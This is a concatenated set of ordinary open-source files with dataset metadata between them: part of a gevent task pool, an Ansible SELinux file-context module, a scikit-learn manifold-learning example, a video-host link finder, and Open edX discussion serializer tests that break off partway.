is_green = True
task_join_will_block = False
def __init__(self, *args, **kwargs):
from gevent import spawn_raw
from gevent.pool import Pool
self.Pool = Pool
self.spawn_n = spawn_raw
self.timeout = kwargs.get('timeout')
super(TaskPool, self).__init__(*args, **kwargs)
def on_start(self):
self._pool = self.Pool(self.limit)
self._quick_put = self._pool.spawn
def on_stop(self):
if self._pool is not None:
self._pool.join()
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, timeout=None,
timeout_callback=None, **_):
timeout = self.timeout if timeout is None else timeout
return self._quick_put(apply_timeout if timeout else apply_target,
target, args, kwargs, callback, accept_callback,
timeout=timeout,
timeout_callback=timeout_callback)
def grow(self, n=1):
self._pool._semaphore.counter += n
self._pool.size += n
def shrink(self, n=1):
self._pool._semaphore.counter -= n
self._pool.size -= n
@property
def num_processes(self):
return len(self._pool)
| gpl-2.0 | -4,081,642,633,367,579,600 | 24.808824 | 79 | 0.553561 | false |
defionscode/ansible | lib/ansible/modules/system/sefcontext.py | 3 | 9116 | #!/usr/bin/python
# Copyright: (c) 2016, Dag Wieers (@dagwieers) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: sefcontext
short_description: Manages SELinux file context mapping definitions
description:
- Manages SELinux file context mapping definitions.
- Similar to the C(semanage fcontext) command.
version_added: '2.2'
options:
target:
description:
- Target path (expression).
type: str
required: yes
aliases: [ path ]
ftype:
description:
- The file type that should have SELinux contexts applied.
- "The following file type options are available:"
- C(a) for all files,
- C(b) for block devices,
- C(c) for character devices,
- C(d) for directories,
- C(f) for regular files,
- C(l) for symbolic links,
- C(p) for named pipes,
- C(s) for socket files.
type: str
default: a
setype:
description:
- SELinux type for the specified target.
required: yes
seuser:
description:
- SELinux user for the specified target.
type: str
selevel:
description:
- SELinux range for the specified target.
type: str
aliases: [ serange ]
state:
description:
- Whether the SELinux file context must be C(absent) or C(present).
type: str
choices: [ absent, present ]
default: present
reload:
description:
- Reload SELinux policy after commit.
- Note that this does not apply SELinux file contexts to existing files.
type: bool
default: 'yes'
notes:
- The changes are persistent across reboots.
- The M(sefcontext) module does not modify existing files to the new
SELinux context(s), so it is advisable to first create the SELinux
file contexts before creating files, or run C(restorecon) manually
for the existing files that require the new SELinux file contexts.
- Not applying SELinux fcontexts to existing files is a deliberate
decision as it would be unclear what reported changes would entail
to, and there's no guarantee that applying SELinux fcontext does
not pick up other unrelated prior changes.
requirements:
- libselinux-python
- policycoreutils-python
author:
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
- name: Allow apache to modify files in /srv/git_repos
sefcontext:
target: '/srv/git_repos(/.*)?'
setype: httpd_git_rw_content_t
state: present
- name: Apply new SELinux file context to filesystem
command: restorecon -irv /srv/git_repos
'''
RETURN = r'''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils._text import to_native
try:
import selinux
HAVE_SELINUX = True
except ImportError:
HAVE_SELINUX = False
try:
import seobject
HAVE_SEOBJECT = True
except ImportError:
HAVE_SEOBJECT = False
# Add missing entries (backward compatible)
if HAVE_SEOBJECT:
seobject.file_types.update(dict(
a=seobject.SEMANAGE_FCONTEXT_ALL,
b=seobject.SEMANAGE_FCONTEXT_BLOCK,
c=seobject.SEMANAGE_FCONTEXT_CHAR,
d=seobject.SEMANAGE_FCONTEXT_DIR,
f=seobject.SEMANAGE_FCONTEXT_REG,
l=seobject.SEMANAGE_FCONTEXT_LINK,
p=seobject.SEMANAGE_FCONTEXT_PIPE,
s=seobject.SEMANAGE_FCONTEXT_SOCK,
))
# Make backward compatible
option_to_file_type_str = dict(
a='all files',
b='block device',
c='character device',
d='directory',
f='regular file',
l='symbolic link',
p='named pipe',
s='socket file',
)
def semanage_fcontext_exists(sefcontext, target, ftype):
''' Get the SELinux file context mapping definition from policy. Return None if it does not exist. '''
# Beware that records comprise of a string representation of the file_type
record = (target, option_to_file_type_str[ftype])
records = sefcontext.get_all()
try:
return records[record]
except KeyError:
return None
def semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser, sestore=''):
''' Add or modify SELinux file context mapping definition to the policy. '''
changed = False
prepared_diff = ''
try:
sefcontext = seobject.fcontextRecords(sestore)
sefcontext.set_reload(do_reload)
exists = semanage_fcontext_exists(sefcontext, target, ftype)
if exists:
# Modify existing entry
orig_seuser, orig_serole, orig_setype, orig_serange = exists
if seuser is None:
seuser = orig_seuser
if serange is None:
serange = orig_serange
if setype != orig_setype or seuser != orig_seuser or serange != orig_serange:
if not module.check_mode:
sefcontext.modify(target, setype, ftype, serange, seuser)
changed = True
if module._diff:
prepared_diff += '# Change to semanage file context mappings\n'
prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, orig_seuser, orig_serole, orig_setype, orig_serange)
prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, orig_serole, setype, serange)
else:
# Add missing entry
if seuser is None:
seuser = 'system_u'
if serange is None:
serange = 's0'
if not module.check_mode:
sefcontext.add(target, setype, ftype, serange, seuser)
changed = True
if module._diff:
prepared_diff += '# Addition to semanage file context mappings\n'
prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, 'object_r', setype, serange)
except Exception:
e = get_exception()
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)))
if module._diff and prepared_diff:
result['diff'] = dict(prepared=prepared_diff)
module.exit_json(changed=changed, seuser=seuser, serange=serange, **result)
def semanage_fcontext_delete(module, result, target, ftype, do_reload, sestore=''):
''' Delete SELinux file context mapping definition from the policy. '''
changed = False
prepared_diff = ''
try:
sefcontext = seobject.fcontextRecords(sestore)
sefcontext.set_reload(do_reload)
exists = semanage_fcontext_exists(sefcontext, target, ftype)
if exists:
# Remove existing entry
orig_seuser, orig_serole, orig_setype, orig_serange = exists
if not module.check_mode:
sefcontext.delete(target, ftype)
changed = True
if module._diff:
prepared_diff += '# Deletion to semanage file context mappings\n'
prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, exists[0], exists[1], exists[2], exists[3])
except Exception:
e = get_exception()
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)))
if module._diff and prepared_diff:
result['diff'] = dict(prepared=prepared_diff)
module.exit_json(changed=changed, **result)
def main():
module = AnsibleModule(
argument_spec=dict(
target=dict(required=True, aliases=['path']),
ftype=dict(type='str', default='a', choices=option_to_file_type_str.keys()),
setype=dict(type='str', required=True),
seuser=dict(type='str'),
selevel=dict(type='str', aliases=['serange']),
state=dict(type='str', default='present', choices=['absent', 'present']),
reload=dict(type='bool', default=True),
),
supports_check_mode=True,
)
if not HAVE_SELINUX:
module.fail_json(msg="This module requires libselinux-python")
if not HAVE_SEOBJECT:
module.fail_json(msg="This module requires policycoreutils-python")
if not selinux.is_selinux_enabled():
module.fail_json(msg="SELinux is disabled on this host.")
target = module.params['target']
ftype = module.params['ftype']
setype = module.params['setype']
seuser = module.params['seuser']
serange = module.params['selevel']
state = module.params['state']
do_reload = module.params['reload']
result = dict(target=target, ftype=ftype, setype=setype, state=state)
if state == 'present':
semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser)
elif state == 'absent':
semanage_fcontext_delete(module, result, target, ftype, do_reload)
else:
module.fail_json(msg='Invalid value of argument "state": {0}'.format(state))
if __name__ == '__main__':
main()
| gpl-3.0 | 8,070,996,363,429,504,000 | 31.673835 | 140 | 0.632405 | false |
treycausey/scikit-learn | examples/manifold/plot_manifold_sphere.py | 8 | 4585 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=============================================
Manifold Learning methods on a severed sphere
=============================================
An application of the different :ref:`manifold` techniques
on a spherical data-set. Here one can see the use of
dimensionality reduction in order to gain some intuition
regarding the Manifold learning methods. Regarding the dataset,
the poles are cut from the sphere, as well as a thin slice down its
side. This enables the manifold learning techniques to
'spread it open' whilst projecting it onto two dimensions.
For a similar example, where the methods are applied to the
S-curve dataset, see :ref:`example_manifold_plot_compare_methods.py`
Note that the purpose of the :ref:`MDS <multidimensional_scaling>` is
to find a low-dimensional representation of the data (here 2D) in
which the distances respect well the distances in the original
high-dimensional space, unlike other manifold-learning algorithms,
it does not seeks an isotropic representation of the data in
the low-dimensional space. Here the manifold problem matches fairly
that of representing a flat map of the Earth, as with
`map projection <http://en.wikipedia.org/wiki/Map_projection>`_
"""
# Author: Jaques Grobler <[email protected]>
# License: BSD 3 clause
print(__doc__)
from time import time
import numpy as np
import pylab as pl
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import NullFormatter
from sklearn import manifold
from sklearn.utils import check_random_state
# Next line to silence pyflakes.
Axes3D
# Variables for manifold learning.
n_neighbors = 10
n_samples = 1000
# Create our sphere.
random_state = check_random_state(0)
p = random_state.rand(n_samples) * (2 * np.pi - 0.55)
t = random_state.rand(n_samples) * np.pi
# Sever the poles from the sphere.
indices = ((t < (np.pi - (np.pi / 8))) & (t > ((np.pi / 8))))
colors = p[indices]
x, y, z = np.sin(t[indices]) * np.cos(p[indices]), \
np.sin(t[indices]) * np.sin(p[indices]), \
np.cos(t[indices])
# Plot our dataset.
fig = pl.figure(figsize=(15, 8))
pl.suptitle("Manifold Learning with %i points, %i neighbors"
% (1000, n_neighbors), fontsize=14)
ax = fig.add_subplot(241, projection='3d')
ax.scatter(x, y, z, c=p[indices], cmap=pl.cm.rainbow)
try:
# compatibility matplotlib < 1.0
ax.view_init(40, -10)
except:
pass
sphere_data = np.array([x, y, z]).T
# Perform Locally Linear Embedding Manifold learning
methods = ['standard', 'ltsa', 'hessian', 'modified']
labels = ['LLE', 'LTSA', 'Hessian LLE', 'Modified LLE']
for i, method in enumerate(methods):
t0 = time()
trans_data = manifold\
.LocallyLinearEmbedding(n_neighbors, 2,
method=method).fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % (methods[i], t1 - t0))
ax = fig.add_subplot(242 + i)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("%s (%.2g sec)" % (labels[i], t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Isomap Manifold learning.
t0 = time()
trans_data = manifold.Isomap(n_neighbors, n_components=2)\
.fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % ('ISO', t1 - t0))
ax = fig.add_subplot(246)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("%s (%.2g sec)" % ('Isomap', t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Multi-dimensional scaling.
t0 = time()
mds = manifold.MDS(2, max_iter=100, n_init=1)
trans_data = mds.fit_transform(sphere_data).T
t1 = time()
print("MDS: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(247)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("MDS (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
# Perform Spectral Embedding.
t0 = time()
se = manifold.SpectralEmbedding(n_components=2,
n_neighbors=n_neighbors)
trans_data = se.fit_transform(sphere_data).T
t1 = time()
print("Spectral Embedding: %.2g sec" % (t1 - t0))
ax = fig.add_subplot(248)
pl.scatter(trans_data[0], trans_data[1], c=colors, cmap=pl.cm.rainbow)
pl.title("Spectral Embedding (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
pl.axis('tight')
pl.show()
| bsd-3-clause | 4,418,982,823,860,495,000 | 31.51773 | 75 | 0.679826 | false |
Mzero2010/MaxZone | plugin.video.Mzero/servers/cloudsix.py | 4 | 1449 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para cloudsix
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#------------------------------------------------------------
import re
from core import logger
def test_video_exists( page_url ):
logger.info("pelisalacarta.servers.cloudsix test_video_exists(page_url='%s')" % page_url)
return False,"Este servidor no es compatible con pelisalacarta"
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
logger.info("pelisalacarta.servers.cloudsix get_video_url(page_url='%s')" % page_url)
video_urls = []
return video_urls
# Encuentra vídeos del servidor en el texto pasado
def find_videos(data):
encontrados = set()
devuelve = []
# http://cloudsix.me/users/abc/123/BlaBlaBla.cas
patronvideos = 'cloudsix.me/users/([^\/]+/\d+)'
logger.info("pelisalacarta.servers.cloudsix find_videos #"+patronvideos+"#")
matches = re.compile(patronvideos,re.DOTALL).findall(data)
for match in matches:
titulo = "[cloudsix]"
url = "http://cloudsix.me/users/"+match
if url not in encontrados:
logger.info(" url="+url)
devuelve.append( [ titulo , url , 'cloudsix' ] )
encontrados.add(url)
else:
logger.info(" url duplicada="+url)
return devuelve
| gpl-3.0 | -7,217,112,036,263,297,000 | 32.674419 | 93 | 0.59116 | false |
nanolearningllc/edx-platform-cypress-2 | lms/djangoapps/discussion_api/tests/test_serializers.py | 21 | 33579 | """
Tests for Discussion API serializers
"""
import itertools
from urlparse import urlparse
import ddt
import httpretty
import mock
from django.test.client import RequestFactory
from discussion_api.serializers import CommentSerializer, ThreadSerializer, get_context
from discussion_api.tests.utils import (
CommentsServiceMockMixin,
make_minimal_cs_thread,
make_minimal_cs_comment,
)
from django_comment_common.models import (
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_COMMUNITY_TA,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_STUDENT,
Role,
)
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from student.tests.factories import UserFactory
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory
@ddt.ddt
class SerializerTestMixin(CommentsServiceMockMixin, UrlResetMixin):
@classmethod
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUpClass(cls):
super(SerializerTestMixin, cls).setUpClass()
cls.course = CourseFactory.create()
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(SerializerTestMixin, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.maxDiff = None # pylint: disable=invalid-name
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.author = UserFactory.create()
def create_role(self, role_name, users, course=None):
"""Create a Role in self.course with the given name and users"""
course = course or self.course
role = Role.objects.create(name=role_name, course_id=course.id)
role.users = users
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, True, False, True),
(FORUM_ROLE_ADMINISTRATOR, False, True, False),
(FORUM_ROLE_MODERATOR, True, False, True),
(FORUM_ROLE_MODERATOR, False, True, False),
(FORUM_ROLE_COMMUNITY_TA, True, False, True),
(FORUM_ROLE_COMMUNITY_TA, False, True, False),
(FORUM_ROLE_STUDENT, True, False, True),
(FORUM_ROLE_STUDENT, False, True, True),
)
@ddt.unpack
def test_anonymity(self, role_name, anonymous, anonymous_to_peers, expected_serialized_anonymous):
"""
Test that content is properly made anonymous.
Content should be anonymous iff the anonymous field is true or the
anonymous_to_peers field is true and the requester does not have a
privileged role.
role_name is the name of the requester's role.
anonymous is the value of the anonymous field in the content.
anonymous_to_peers is the value of the anonymous_to_peers field in the
content.
expected_serialized_anonymous is whether the content should actually be
anonymous in the API output when requested by a user with the given
role.
"""
self.create_role(role_name, [self.user])
serialized = self.serialize(
self.make_cs_content({"anonymous": anonymous, "anonymous_to_peers": anonymous_to_peers})
)
actual_serialized_anonymous = serialized["author"] is None
self.assertEqual(actual_serialized_anonymous, expected_serialized_anonymous)
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, False, "staff"),
(FORUM_ROLE_ADMINISTRATOR, True, None),
(FORUM_ROLE_MODERATOR, False, "staff"),
(FORUM_ROLE_MODERATOR, True, None),
(FORUM_ROLE_COMMUNITY_TA, False, "community_ta"),
(FORUM_ROLE_COMMUNITY_TA, True, None),
(FORUM_ROLE_STUDENT, False, None),
(FORUM_ROLE_STUDENT, True, None),
)
@ddt.unpack
def test_author_labels(self, role_name, anonymous, expected_label):
"""
Test correctness of the author_label field.
The label should be "staff", "staff", or "community_ta" for the
Administrator, Moderator, and Community TA roles, respectively, but
the label should not be present if the content is anonymous.
role_name is the name of the author's role.
anonymous is the value of the anonymous field in the content.
expected_label is the expected value of the author_label field in the
API output.
"""
self.create_role(role_name, [self.author])
serialized = self.serialize(self.make_cs_content({"anonymous": anonymous}))
self.assertEqual(serialized["author_label"], expected_label)
def test_abuse_flagged(self):
serialized = self.serialize(self.make_cs_content({"abuse_flaggers": [str(self.user.id)]}))
self.assertEqual(serialized["abuse_flagged"], True)
def test_voted(self):
thread_id = "test_thread"
self.register_get_user_response(self.user, upvoted_ids=[thread_id])
serialized = self.serialize(self.make_cs_content({"id": thread_id}))
self.assertEqual(serialized["voted"], True)
@ddt.ddt
class ThreadSerializerSerializationTest(SerializerTestMixin, SharedModuleStoreTestCase):
"""Tests for ThreadSerializer serialization."""
def make_cs_content(self, overrides):
"""
Create a thread with the given overrides, plus some useful test data.
"""
merged_overrides = {
"course_id": unicode(self.course.id),
"user_id": str(self.author.id),
"username": self.author.username,
"read": True,
"endorsed": True
}
merged_overrides.update(overrides)
return make_minimal_cs_thread(merged_overrides)
def serialize(self, thread):
"""
Create a serializer with an appropriate context and use it to serialize
the given thread, returning the result.
"""
return ThreadSerializer(thread, context=get_context(self.course, self.request)).data
def test_basic(self):
thread = {
"type": "thread",
"id": "test_thread",
"course_id": unicode(self.course.id),
"commentable_id": "test_topic",
"group_id": None,
"user_id": str(self.author.id),
"username": self.author.username,
"anonymous": False,
"anonymous_to_peers": False,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"thread_type": "discussion",
"title": "Test Title",
"body": "Test body",
"pinned": True,
"closed": False,
"abuse_flaggers": [],
"votes": {"up_count": 4},
"comments_count": 5,
"unread_comments_count": 3,
"read": False,
"endorsed": False
}
expected = {
"id": "test_thread",
"course_id": unicode(self.course.id),
"topic_id": "test_topic",
"group_id": None,
"group_name": None,
"author": self.author.username,
"author_label": None,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"type": "discussion",
"title": "Test Title",
"raw_body": "Test body",
"rendered_body": "<p>Test body</p>",
"pinned": True,
"closed": False,
"following": False,
"abuse_flagged": False,
"voted": False,
"vote_count": 4,
"comment_count": 5,
"unread_comment_count": 3,
"comment_list_url": "http://testserver/api/discussion/v1/comments/?thread_id=test_thread",
"endorsed_comment_list_url": None,
"non_endorsed_comment_list_url": None,
"editable_fields": ["abuse_flagged", "following", "voted"],
"read": False,
"has_endorsed": False
}
self.assertEqual(self.serialize(thread), expected)
thread["thread_type"] = "question"
expected.update({
"type": "question",
"comment_list_url": None,
"endorsed_comment_list_url": (
"http://testserver/api/discussion/v1/comments/?thread_id=test_thread&endorsed=True"
),
"non_endorsed_comment_list_url": (
"http://testserver/api/discussion/v1/comments/?thread_id=test_thread&endorsed=False"
),
})
self.assertEqual(self.serialize(thread), expected)
def test_pinned_missing(self):
"""
Make sure that older threads in the comments service without the pinned
field do not break serialization
"""
thread_data = self.make_cs_content({})
del thread_data["pinned"]
self.register_get_thread_response(thread_data)
serialized = self.serialize(Thread(id=thread_data["id"]))
self.assertEqual(serialized["pinned"], False)
def test_group(self):
cohort = CohortFactory.create(course_id=self.course.id)
serialized = self.serialize(self.make_cs_content({"group_id": cohort.id}))
self.assertEqual(serialized["group_id"], cohort.id)
self.assertEqual(serialized["group_name"], cohort.name)
def test_following(self):
thread_id = "test_thread"
self.register_get_user_response(self.user, subscribed_thread_ids=[thread_id])
serialized = self.serialize(self.make_cs_content({"id": thread_id}))
self.assertEqual(serialized["following"], True)
@ddt.ddt
class CommentSerializerTest(SerializerTestMixin, SharedModuleStoreTestCase):
"""Tests for CommentSerializer."""
def setUp(self):
super(CommentSerializerTest, self).setUp()
self.endorser = UserFactory.create()
self.endorsed_at = "2015-05-18T12:34:56Z"
def make_cs_content(self, overrides=None, with_endorsement=False):
"""
Create a comment with the given overrides, plus some useful test data.
"""
merged_overrides = {
"user_id": str(self.author.id),
"username": self.author.username
}
if with_endorsement:
merged_overrides["endorsement"] = {
"user_id": str(self.endorser.id),
"time": self.endorsed_at
}
merged_overrides.update(overrides or {})
return make_minimal_cs_comment(merged_overrides)
def serialize(self, comment, thread_data=None):
"""
Create a serializer with an appropriate context and use it to serialize
the given comment, returning the result.
"""
context = get_context(self.course, self.request, make_minimal_cs_thread(thread_data))
return CommentSerializer(comment, context=context).data
def test_basic(self):
comment = {
"type": "comment",
"id": "test_comment",
"thread_id": "test_thread",
"user_id": str(self.author.id),
"username": self.author.username,
"anonymous": False,
"anonymous_to_peers": False,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"body": "Test body",
"endorsed": False,
"abuse_flaggers": [],
"votes": {"up_count": 4},
"children": [],
}
expected = {
"id": "test_comment",
"thread_id": "test_thread",
"parent_id": None,
"author": self.author.username,
"author_label": None,
"created_at": "2015-04-28T00:00:00Z",
"updated_at": "2015-04-28T11:11:11Z",
"raw_body": "Test body",
"rendered_body": "<p>Test body</p>",
"endorsed": False,
"endorsed_by": None,
"endorsed_by_label": None,
"endorsed_at": None,
"abuse_flagged": False,
"voted": False,
"vote_count": 4,
"children": [],
"editable_fields": ["abuse_flagged", "voted"],
}
self.assertEqual(self.serialize(comment), expected)
@ddt.data(
*itertools.product(
[
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
FORUM_ROLE_STUDENT,
],
[True, False]
)
)
@ddt.unpack
def test_endorsed_by(self, endorser_role_name, thread_anonymous):
"""
Test correctness of the endorsed_by field.
The endorser should be anonymous iff the thread is anonymous to the
requester, and the endorser is not a privileged user.
endorser_role_name is the name of the endorser's role.
thread_anonymous is the value of the anonymous field in the thread.
"""
self.create_role(endorser_role_name, [self.endorser])
serialized = self.serialize(
self.make_cs_content(with_endorsement=True),
thread_data={"anonymous": thread_anonymous}
)
actual_endorser_anonymous = serialized["endorsed_by"] is None
expected_endorser_anonymous = endorser_role_name == FORUM_ROLE_STUDENT and thread_anonymous
self.assertEqual(actual_endorser_anonymous, expected_endorser_anonymous)
@ddt.data(
(FORUM_ROLE_ADMINISTRATOR, "staff"),
(FORUM_ROLE_MODERATOR, "staff"),
(FORUM_ROLE_COMMUNITY_TA, "community_ta"),
(FORUM_ROLE_STUDENT, None),
)
@ddt.unpack
def test_endorsed_by_labels(self, role_name, expected_label):
"""
Test correctness of the endorsed_by_label field.
The label should be "staff", "staff", or "community_ta" for the
Administrator, Moderator, and Community TA roles, respectively.
role_name is the name of the author's role.
expected_label is the expected value of the author_label field in the
API output.
"""
self.create_role(role_name, [self.endorser])
serialized = self.serialize(self.make_cs_content(with_endorsement=True))
self.assertEqual(serialized["endorsed_by_label"], expected_label)
def test_endorsed_at(self):
serialized = self.serialize(self.make_cs_content(with_endorsement=True))
self.assertEqual(serialized["endorsed_at"], self.endorsed_at)
def test_children(self):
comment = self.make_cs_content({
"id": "test_root",
"children": [
self.make_cs_content({
"id": "test_child_1",
"parent_id": "test_root",
}),
self.make_cs_content({
"id": "test_child_2",
"parent_id": "test_root",
"children": [
self.make_cs_content({
"id": "test_grandchild",
"parent_id": "test_child_2"
})
],
}),
],
})
serialized = self.serialize(comment)
self.assertEqual(serialized["children"][0]["id"], "test_child_1")
self.assertEqual(serialized["children"][0]["parent_id"], "test_root")
self.assertEqual(serialized["children"][1]["id"], "test_child_2")
self.assertEqual(serialized["children"][1]["parent_id"], "test_root")
self.assertEqual(serialized["children"][1]["children"][0]["id"], "test_grandchild")
self.assertEqual(serialized["children"][1]["children"][0]["parent_id"], "test_child_2")
@ddt.ddt
class ThreadSerializerDeserializationTest(CommentsServiceMockMixin, UrlResetMixin, SharedModuleStoreTestCase):
"""Tests for ThreadSerializer deserialization."""
@classmethod
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUpClass(cls):
super(ThreadSerializerDeserializationTest, cls).setUpClass()
cls.course = CourseFactory.create()
@mock.patch.dict("django.conf.settings.FEATURES", {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(ThreadSerializerDeserializationTest, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.minimal_data = {
"course_id": unicode(self.course.id),
"topic_id": "test_topic",
"type": "discussion",
"title": "Test Title",
"raw_body": "Test body",
}
self.existing_thread = Thread(**make_minimal_cs_thread({
"id": "existing_thread",
"course_id": unicode(self.course.id),
"commentable_id": "original_topic",
"thread_type": "discussion",
"title": "Original Title",
"body": "Original body",
"user_id": str(self.user.id),
"read": "False",
"endorsed": "False"
}))
def save_and_reserialize(self, data, instance=None):
"""
Create a serializer with the given data and (if updating) instance,
ensure that it is valid, save the result, and return the full thread
data from the serializer.
"""
serializer = ThreadSerializer(
instance,
data=data,
partial=(instance is not None),
context=get_context(self.course, self.request)
)
self.assertTrue(serializer.is_valid())
serializer.save()
return serializer.data
def test_create_minimal(self):
self.register_post_thread_response({"id": "test_id"})
saved = self.save_and_reserialize(self.minimal_data)
self.assertEqual(
urlparse(httpretty.last_request().path).path,
"/api/v1/test_topic/threads"
)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["test_topic"],
"thread_type": ["discussion"],
"title": ["Test Title"],
"body": ["Test body"],
"user_id": [str(self.user.id)],
}
)
self.assertEqual(saved["id"], "test_id")
def test_create_all_fields(self):
self.register_post_thread_response({"id": "test_id"})
data = self.minimal_data.copy()
data["group_id"] = 42
self.save_and_reserialize(data)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["test_topic"],
"thread_type": ["discussion"],
"title": ["Test Title"],
"body": ["Test body"],
"user_id": [str(self.user.id)],
"group_id": ["42"],
}
)
def test_create_missing_field(self):
for field in self.minimal_data:
data = self.minimal_data.copy()
data.pop(field)
serializer = ThreadSerializer(data=data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors,
{field: ["This field is required."]}
)
@ddt.data("", " ")
def test_create_empty_string(self, value):
data = self.minimal_data.copy()
data.update({field: value for field in ["topic_id", "title", "raw_body"]})
serializer = ThreadSerializer(data=data, context=get_context(self.course, self.request))
self.assertEqual(
serializer.errors,
{field: ["This field is required."] for field in ["topic_id", "title", "raw_body"]}
)
def test_create_type(self):
self.register_post_thread_response({"id": "test_id"})
data = self.minimal_data.copy()
data["type"] = "question"
self.save_and_reserialize(data)
data["type"] = "invalid_type"
serializer = ThreadSerializer(data=data)
self.assertFalse(serializer.is_valid())
def test_update_empty(self):
self.register_put_thread_response(self.existing_thread.attributes)
self.save_and_reserialize({}, self.existing_thread)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["original_topic"],
"thread_type": ["discussion"],
"title": ["Original Title"],
"body": ["Original body"],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"closed": ["False"],
"pinned": ["False"],
"user_id": [str(self.user.id)],
}
)
def test_update_all(self):
self.register_put_thread_response(self.existing_thread.attributes)
data = {
"topic_id": "edited_topic",
"type": "question",
"title": "Edited Title",
"raw_body": "Edited body",
}
saved = self.save_and_reserialize(data, self.existing_thread)
self.assertEqual(
httpretty.last_request().parsed_body,
{
"course_id": [unicode(self.course.id)],
"commentable_id": ["edited_topic"],
"thread_type": ["question"],
"title": ["Edited Title"],
"body": ["Edited body"],
"anonymous": ["False"],
"anonymous_to_peers": ["False"],
"closed": ["False"],
"pinned": ["False"],
"user_id": [str(self.user.id)],
}
)
for key in data:
self.assertEqual(saved[key], data[key])
@ddt.data("", " ")
def test_update_empty_string(self, value):
serializer = ThreadSerializer(
self.existing_thread,
data={field: value for field in ["topic_id", "title", "raw_body"]},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{field: ["This field is required."] for field in ["topic_id", "title", "raw_body"]}
)
def test_update_course_id(self):
serializer = ThreadSerializer(
self.existing_thread,
data={"course_id": "some/other/course"},
partial=True,
context=get_context(self.course, self.request)
)
self.assertEqual(
serializer.errors,
{"course_id": ["This field is not allowed in an update."]}
)
@ddt.ddt
class CommentSerializerDeserializationTest(CommentsServiceMockMixin, SharedModuleStoreTestCase):
"""Tests for ThreadSerializer deserialization."""
@classmethod
def setUpClass(cls):
super(CommentSerializerDeserializationTest, cls).setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super(CommentSerializerDeserializationTest, self).setUp()
httpretty.reset()
httpretty.enable()
self.addCleanup(httpretty.disable)
self.user = UserFactory.create()
self.register_get_user_response(self.user)
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
self.minimal_data = {
"thread_id": "test_thread",
"raw_body": "Test body",
}
